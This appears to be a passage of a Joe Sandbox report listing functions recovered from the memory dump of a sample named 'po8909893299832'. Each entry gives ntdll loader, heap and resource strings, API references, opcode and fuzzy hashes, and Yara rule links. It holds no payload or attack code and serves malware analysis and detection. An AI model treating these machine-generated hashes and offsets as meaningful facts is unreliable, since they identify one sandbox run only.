Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: a763fdd7ad7579941eec4323628a19b03ad22f606aff5d9f6f7fb4fb39b49d06
Instruction ID: 16bd3d38b17137f98bf6e0ecf6ceae0d5fd619bb681261ef49c83c5a972cf787
Opcode Fuzzy Hash: a763fdd7ad7579941eec4323628a19b03ad22f606aff5d9f6f7fb4fb39b49d06
Instruction Fuzzy Hash: 32416272E00219EBDF11EBD8C951FEEBBB9AB54B10F14406EEA09B7284D7749A44CB50

Function 01AA4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01AA4225
LdrpResValidateFilePath Enter, xrefs: 01AA4160
LdrpResValidateFilePath Exit, xrefs: 01AA4172

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: b12b2cddb60514ffbd89977ea5a4d57ab0797b62f81a47bae33410f8d7e8469c
Instruction ID: 3c41bcd2c3920d22e7e3b85f3a496b6f1ef7031d92eaad8e31086517839778e5
Opcode Fuzzy Hash: b12b2cddb60514ffbd89977ea5a4d57ab0797b62f81a47bae33410f8d7e8469c
Instruction Fuzzy Hash: C3412671A047588BEB26DBE8C940BADBBF4FF59340F5C046AE901EB382D7B59905CB10

Function 01A20BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 01A75431
HEAP: , xrefs: 01A7543E
(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size), xrefs: 01A75449

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-2558761708
Opcode ID: 5aced55433e65c327ebc07835fee3b36092834b7800054a33d0354262d7506ba
Instruction ID: 5e92a13aef06bda1f790158bd1ebf9625f0feaec43c186f2506581591f3dbe11
Opcode Fuzzy Hash: 5aced55433e65c327ebc07835fee3b36092834b7800054a33d0354262d7506ba
Instruction Fuzzy Hash: 271103317541129FEB2ACB2CDA84F36B3A6EF50715F18816DF40ACB292DB30E840C750

Function 01A920DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A92104
LdrpInitializationFailure, xrefs: 01A920FA
Process initialization failed with status 0x%08lx, xrefs: 01A920F3

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 851d878823cfa281ee2b4b6d0ed6bb56e8fc081759e5f150882daef36947f200
Instruction ID: 9e3efbee823daf042f52fb9276b455f41362e261b74121cb113599477df175f7
Opcode Fuzzy Hash: 851d878823cfa281ee2b4b6d0ed6bb56e8fc081759e5f150882daef36947f200
Instruction Fuzzy Hash: D3F02274640308BFEB20E70CCD46F997BE8FB90B54F20002DFB0467281E2B0A990CB81

Function 01A203E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A74D8A

Strings

#%u, xrefs: 01A74D82

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: bce902ba85b3aca208f2c2b265ffecf65e08da33c35b42da8a08d7b9c0e4158a
Instruction ID: c2dbea32ecdee890773c3d94eea641fec0f6da875f634faaab972ced45f86677
Opcode Fuzzy Hash: bce902ba85b3aca208f2c2b265ffecf65e08da33c35b42da8a08d7b9c0e4158a
Instruction Fuzzy Hash: 7D715971A0015A9FDB01DFA8CA84BAEB7F8FF18744F144065E905E7252EB38EE45CB60

Function 01A9892A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A9895E

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 81bf1ba64baa3ed84023d5c9d0941b64ded16b55bd9a5ecb13fe9f24d86b85ee
Instruction ID: 3b7ec4a5da78cb8b5c0f968ae9a7c07c2730c42f568166f1bbd1f4fd993f1dbf
Opcode Fuzzy Hash: 81bf1ba64baa3ed84023d5c9d0941b64ded16b55bd9a5ecb13fe9f24d86b85ee
Instruction Fuzzy Hash: 90012B32300209AFEF365B56DD88A567FE5FF97654B04001CF64587952CB2468C1CB92

Function 01A1A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

LdrResSearchResource Enter, xrefs: 01A1AA13
LdrResSearchResource Exit, xrefs: 01A1AA25

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
API String ID: 0-4066393604
Opcode ID: 7450889f7aaec0b08837ddfdbf2ae15fcf020a4a794adb72bf9e27a0fe9f1b22
Instruction ID: 996844160f99748d81aa772db44673749a00f6a40c73f469901b2222be437306
Opcode Fuzzy Hash: 7450889f7aaec0b08837ddfdbf2ae15fcf020a4a794adb72bf9e27a0fe9f1b22
Instruction Fuzzy Hash: 67E19271E05299AFEF22CF99DE80BAEBBB9FF04310F154426E901E7245D7749941CB50

Function 01ADA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 01ADA44B
`, xrefs: 01ADA551

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: acbc8f20d9f64a8f839a58054ea8492ace4f7c64acaeece73369d41a99fd51bd
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 3DC1BF31204B429BEB25CF28C941B6BBBE5AFC4318F084A2DF697CB291D774D505CB81

Function 01A8E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

UEFI, xrefs: 01A8E751
Legacy, xrefs: 01A8E75A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: d17e3d107177baa50f13dfd82b1ab77ed6b361940e9da7b7e86169672d4feb39
Instruction ID: f1f2667aaf7e910e2d92c821b1daed1d9343edb11add3d13e2667eba82fd1d7d
Opcode Fuzzy Hash: d17e3d107177baa50f13dfd82b1ab77ed6b361940e9da7b7e86169672d4feb39
Instruction Fuzzy Hash: BE6118B1E14219DFDB25EFA9C940BAEBBF9FB48700F14406DEA49EB251D731A940CB50

Function 01AB43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON

Download Yara Rule

Strings

MUI, xrefs: 01AB4525
@, xrefs: 01AB4437

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 1361a7c834188431c6194578666bb7f8063b4273f71b26875b4a465b3e184a96
Instruction ID: edc0c1dd38cb1315d0f2d9390511245269d70f729ad2c10ace67789de730aac9
Opcode Fuzzy Hash: 1361a7c834188431c6194578666bb7f8063b4273f71b26875b4a465b3e184a96
Instruction Fuzzy Hash: 0F510971D0065DAFEF11DFE9CD80AEEBBBCEB48754F10052AEA11A7292D6349D05CB60

Function 01A1A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 01A1A2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 01A1A309

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 9b5cf7d8af31b5037a8dc7d8453508593dfd3a08e33baa192b1d8cf59f8f6713
Instruction ID: 49306c7b81775e16ce40b06749fc4926c1c67180453580721e0378acee68170a
Opcode Fuzzy Hash: 9b5cf7d8af31b5037a8dc7d8453508593dfd3a08e33baa192b1d8cf59f8f6713
Instruction Fuzzy Hash: 4841CF74A05695DBEB12CF6DC840B6EBBF4FF85700F1880A6E905DB295E3B5DA40CB50

Function 01A4A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 01A4A5E9
Cleanup Group, xrefs: 01A4A5E4

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: eb47d358c06c79f5ac44a2baa331f5058c66ea33f5d3d8ec7210602b0c09be33
Instruction ID: 47d64c320ce0f9f7ad9fe927e4fe237bb1d9a61ff44b6f1c78bc87309037d7ac
Opcode Fuzzy Hash: eb47d358c06c79f5ac44a2baa331f5058c66ea33f5d3d8ec7210602b0c09be33
Instruction Fuzzy Hash: AA01ADB2284700AFE312DF14CE49B56B7E8E794719F058939E649C7190E774D804CB4A

Function 01A1C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 01A1C8C3, 01A1CA40

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: e9f7b1d525771a4caf8613b37661d9260f14082f4225f961b943e2a3d35a3e1d
Instruction ID: 3a4aeae569fe86333c0386ce5d2f65a420ab8e3385eacb2005062e07856bb5f0
Opcode Fuzzy Hash: e9f7b1d525771a4caf8613b37661d9260f14082f4225f961b943e2a3d35a3e1d
Instruction Fuzzy Hash: B4827B75E402188FEB25CFA9C984BEDBBB5BF48320F148169E919EB299D7309D41CF50

Function 01ABA118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01ABA13A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 2e82f2945b6451bde8b33ec7267458e9dfb6d5537364db17a2a1bc26e645c3b2
Instruction ID: 3751098bc65bac6dd39af76a9306b74854119def43de02068d1ed845d7572389
Opcode Fuzzy Hash: 2e82f2945b6451bde8b33ec7267458e9dfb6d5537364db17a2a1bc26e645c3b2
Instruction Fuzzy Hash: 7322CF742046E18BEB25CF2DC0D43B2BBF9AF44300F08855AD9968F287E735D592DB60

Function 01A16A50 Relevance: 2.0, APIs: 1, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87b5a71fb0bbd6c835b2432c978c54a3050c29d5755fc2c46f1ac76ab8727c70
Instruction ID: 2715171d8f982d4936f0e78b39c500353be3d3f6284c1434723308c037002bb5
Opcode Fuzzy Hash: 87b5a71fb0bbd6c835b2432c978c54a3050c29d5755fc2c46f1ac76ab8727c70
Instruction Fuzzy Hash: EE32AD71A04205CFDB25CF68C980BAABBF1FF48310F188569E95AEB395D774E941CB90

Function 01A165D0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff8095c3e7cdddcf4afd1773cc34e72b5bca142ff8950ffa1b141f9c857bed50
Instruction ID: d2b4eae32524d047ab74d76a78a696babf11abb10951ba1234e5779c4c59b251
Opcode Fuzzy Hash: ff8095c3e7cdddcf4afd1773cc34e72b5bca142ff8950ffa1b141f9c857bed50
Instruction Fuzzy Hash: EDE19971608342CFC715CF28C580A6ABBE1BF89314F058A6DE999CB355EB71E905CB92

Function 01A3E5E7 Relevance: 1.8, APIs: 1, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40ec4e7a253e5ac681736591b1e934940c56fdf957797f09214ae516c88da866
Instruction ID: 8d30035a49e8fcf389a6ef93ef716c756a92fb8b48fd79c677dbead994c86fa7
Opcode Fuzzy Hash: 40ec4e7a253e5ac681736591b1e934940c56fdf957797f09214ae516c88da866
Instruction Fuzzy Hash: E2A10471E00619AFEF22DB98CD44BAEBBB4AF84754F050125FA20AB291D7749E41CBD1

Function 01A4CDB1 Relevance: 1.7, APIs: 1, Instructions: 197timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A4CE7D

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 39f2eea308acfaad6c0ced375aa13efb2c1c963e21a7f00be1032f8716614fee
Instruction ID: 26e4eeea5581d583e7a127697b6958ddb6f20e0b181a6050197b811b616d39ca
Opcode Fuzzy Hash: 39f2eea308acfaad6c0ced375aa13efb2c1c963e21a7f00be1032f8716614fee
Instruction Fuzzy Hash: 1661D171A00206DFCB19EF68C981BAEF7B5FF48324F15816AE615EB295DB349901CF50

Function 01A3EBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9c94d24b7851f40f2e23849126ca9d0aa9cc178458261f99b5a28a40812954
Instruction ID: 2f53e656e4083b68dc12e93ba7e1b8fbd362e5054de2dd209e56881bc6111d3e
Opcode Fuzzy Hash: 7e9c94d24b7851f40f2e23849126ca9d0aa9cc178458261f99b5a28a40812954
Instruction Fuzzy Hash: 8A41B1712043019FDB21DF28C984B6BB7F5FF88218F04482AF566C7616EB35E9588B91

Function 01A1262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A12710

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 5fee36e75884a088493d9cd2fc02150047fd463b1c24b85bdea27bad52224c21
Instruction ID: f9605e69b56c84f8fd247786f9fac37fd5a1e8da8c33c9f55f1bf0758819a935
Opcode Fuzzy Hash: 5fee36e75884a088493d9cd2fc02150047fd463b1c24b85bdea27bad52224c21
Instruction Fuzzy Hash: E841B1B1901701CFCB26EF28DA00756BBF5FF54310F2486ABC4169B6A9DB30D941CB51

Function 01A907C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A9083C

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4b74956380216bf727a711fdb721dd275ec5b63f3a9845b4ab0c1ad24648c475
Instruction ID: ba6d9c9e3a4cc62af84fa3f4c8c83987ed855979a157e879d11e3527538bf208
Opcode Fuzzy Hash: 4b74956380216bf727a711fdb721dd275ec5b63f3a9845b4ab0c1ad24648c475
Instruction Fuzzy Hash: DB41AC71608305AFD761DF29C944B9BBBE8FF98764F008A2EF998C7251D7709844CB92

Function 01A14859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A148F7

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 9229c58cdea9da6d8587a3443c152af6cac49fd6faefba1bbb1ac9c7f58b04f1
Instruction ID: 5053a03cfa63f75c6232621ef2e0b85c1fbd49322167b26c1dd9eb6349a49973
Opcode Fuzzy Hash: 9229c58cdea9da6d8587a3443c152af6cac49fd6faefba1bbb1ac9c7f58b04f1
Instruction Fuzzy Hash: 4841F5306003028BD726DF2CD994B2ABBEBFF89760F14442DEA45CB299DB70D951CB91

Function 01ABEBD0 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01ABEC31

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3596f53a6fdcbe4bf73a8691364e4f848da28ce2ffb147565e771a827a076e9d
Instruction ID: b1639bbb0e8eef832a2d8cf3fd94cb40f0adec7716e2c81d25b0269458e7b77f
Opcode Fuzzy Hash: 3596f53a6fdcbe4bf73a8691364e4f848da28ce2ffb147565e771a827a076e9d
Instruction Fuzzy Hash: 27319A715053818FCB16DF19C5809AABBF5FF8A214F048AAEE4889B352E330D944CBD2

Function 01A9A4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A9A51A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 720dc820cf8498cdc1b873380af1b85cfcfdf1dc7fbff1c793ec1cef43ce1bce
Instruction ID: b9602ae68f275d80d579dbcdb243d3a5a5755b37b92786ab67b1e69d4dc450c0
Opcode Fuzzy Hash: 720dc820cf8498cdc1b873380af1b85cfcfdf1dc7fbff1c793ec1cef43ce1bce
Instruction Fuzzy Hash: ED018936200109ABCF129F94D840EDA3FA6FB4C764F068102FE1966220C332D9B0EF81

Function 01A96420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 01A965C1

Memory Dump Source

